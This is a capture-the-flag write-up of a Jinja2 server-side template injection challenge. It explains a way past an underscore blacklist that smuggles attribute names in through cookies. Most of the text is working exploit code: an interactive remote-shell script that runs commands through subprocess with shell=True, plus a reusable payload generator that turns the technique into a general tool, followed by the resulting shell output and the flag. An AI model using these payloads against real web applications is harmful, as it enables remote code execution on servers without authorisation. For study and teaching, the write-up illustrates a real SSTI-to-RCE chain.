Tags: web template-injection python

Rating: 4.0

# http-for-pros (web, 200p, 43 solved)

You have all the hints you need... Get the flag!

Flag format: CTF{sha256}


In the task we get a webpage with some search form.

The form either echoes our input or, for some inputs, returns a WAF-like error saying that a certain character is blacklisted.
It took us a while to notice that the echo is actually a template injection.
If we send {{3*3}} we get back 9, so the input is rendered as a Jinja2 template.

## Template injection

Now the whole blacklist makes sense too: it is there to stop the usual SSTI payloads.
We need to bypass the blacklist and get RCE.

One of the more problematic entries is the underscore itself, which also rules out __class__ and every other dunder attribute.

There are some tricks we can use, though. request.args gives access to the GET parameters, and Jinja2 lets us write [] instead of ., so request[request.args.x] with the GET parameter x=__class__ evaluates to request.__class__ without an underscore ever appearing in the template.

It so happens that the GET parameters were also subjected to the blacklist.

So following the same idea, we can do request[request.cookies['a']], set cookie a=__class__ and we confirm it works.

Now we just need a decent gadget chain starting from request.
The first one we found was request._get_file_stream.im_func.func_globals['__builtins__']['__import__'] (the app runs on Python 2, hence im_func and func_globals), which gets us __import__('subprocess').check_output, so we can craft it:

```python
import requests

# Target URL and the name of the search-form parameter are not recorded here; fill them in.
URL = "http://TARGET/"
PARAM = "query"

# Template reconstructed from the chain above: every underscore-bearing name
# arrives via a cookie, so the blacklist on the query string never sees it.
payload = (
    "{{request[request.cookies['b']][request.cookies['c']][request.cookies['d']]"
    "[request.cookies['e']][request.cookies['f']]('subprocess')"
    "[request.cookies['g']](request.cookies['h'],shell=True)}}"
)

while True:
    cmd = raw_input("sh> ")
    params = {PARAM: payload}
    cookies = {
        "a": "__class__",
        "b": "_get_file_stream",
        "c": "im_func",
        "d": "func_globals",
        "e": "__builtins__",
        "f": "__import__",
        "g": "check_output",
        "h": cmd
    }
    r = requests.get(URL, params=params, cookies=cookies)
    print(r.text)
```
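The two ideas behind the exploit, smuggling blacklisted names through cookies and reaching __import__ via a bound method's globals, as an added stand-alone example that is not part of the original writeup. It models in plain Python the lookup rule Jinja2 applies to obj[name] (subscript first, getattr fallback for string keys, which is why request[request.cookies['a']] with a=__class__ means request.__class__), builds the template plus cookie jar for an arbitrary chain, and resolves the chain locally against a bound method of a standard-library object. It runs on Python 3, so the attribute names are __func__ and __globals__ rather than the Python 2 im_func and func_globals used against the challenge; the blacklist is assumed to be just "_" and "__class__", since the full list was never published, and the module name "subprocess" is sent as a literal because it contains no banned character.

```python
import builtins
import string

# The filter described in the writeup blocks "_" (and so "__class__");
# the full list was never published, so this short list is an assumption.
BLACKLIST = ("_", "__class__")

# Python 3 spelling of the writeup's Python 2 chain: im_func -> __func__,
# func_globals -> __globals__. Root is any bound method of a pure-Python class.
CHAIN_PY3 = ("__func__", "__globals__", "__builtins__", "__import__")


def blacklisted(text, blacklist=BLACKLIST):
    """Model of the WAF-like check: first banned substring found, else None."""
    for bad in blacklist:
        if bad in text:
            return bad
    return None


def jinja_getitem(obj, name):
    """Lookup rule Jinja2 applies to `obj[name]` outside the sandbox: try the
    subscript, then fall back to getattr for string keys."""
    try:
        return obj[name]
    except (TypeError, LookupError):
        if isinstance(name, str):
            return getattr(obj, name)
        raise


def resolve(root, names):
    """Walk a chain of names from root using Jinja2 subscript semantics."""
    for name in names:
        root = jinja_getitem(root, name)
    return root


def build_payload(chain, module, func, cmd, blacklist=BLACKLIST, root="request"):
    """Emit (template, cookies): every chain element travels in cookie a, b, c,
    ...; the template only ever spells the cookie keys and the module name."""
    keys = iter(string.ascii_lowercase)
    cookies = {}
    expr = root
    for name in chain:
        key = next(keys)
        cookies[key] = name
        expr += "[%s.cookies['%s']]" % (root, key)
    k_func, k_cmd = next(keys), next(keys)
    cookies[k_func] = func  # e.g. check_output, which carries an underscore
    cookies[k_cmd] = cmd    # the shell command itself
    expr += "('%s')[%s.cookies['%s']](%s.cookies['%s'], shell=True)" % (
        module, root, k_func, root, k_cmd)
    template = "{{" + expr + "}}"
    hit = blacklisted(template, blacklist)
    if hit is not None:
        raise ValueError("template still contains %r" % hit)
    return template, cookies


if __name__ == "__main__":
    tpl, jar = build_payload(CHAIN_PY3, "subprocess", "check_output", "id")
    print(tpl)
    print(jar)
    # Same chain resolved locally from a bound method of a stdlib object:
    # method -> function -> module globals -> builtins -> __import__.
    imp = resolve(string.Template("").substitute, CHAIN_PY3)
    print(imp is builtins.__import__)
```

The point of resolve is that nothing in the chain is special to werkzeug's Request: any bound method of a class defined in Python reaches its module's globals and from there the builtins, so a blacklist on attribute names only buys time once the attacker controls a second input channel the filter does not inspect.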


And we get a nice shell.
From there we just run ls -la and then cat flag to get:


```
sh> ls -la
total 32
drwxr-xr-x 1 root root 4096 Dec 1 08:56 .
drwxr-xr-x 1 root root 4096 Dec 1 08:56 ..
-rw-r--r-- 1 dctf dctf 220 Aug 31 2015 .bash_logout
-rw-r--r-- 1 dctf dctf 3771 Aug 31 2015 .bashrc
-rw-r--r-- 1 dctf dctf 655 Jul 12 2019 .profile
-rwxr-xr-x 1 root root 2699 Dec 1 08:55 app.py
-rwxr-xr-x 1 root root 69 Dec 1 08:55 flag
drwxr-xr-x 1 root root 4096 Dec 1 08:55 templates

sh> cat flag
CTF{75df3454a132fcdd37d94882e343c6a23e961ed70f8dd88195345aa874c63e63}
```


Original writeup (https://github.com/TFNS/writeups/tree/master/2020-12-05-DefCampCTF/pros).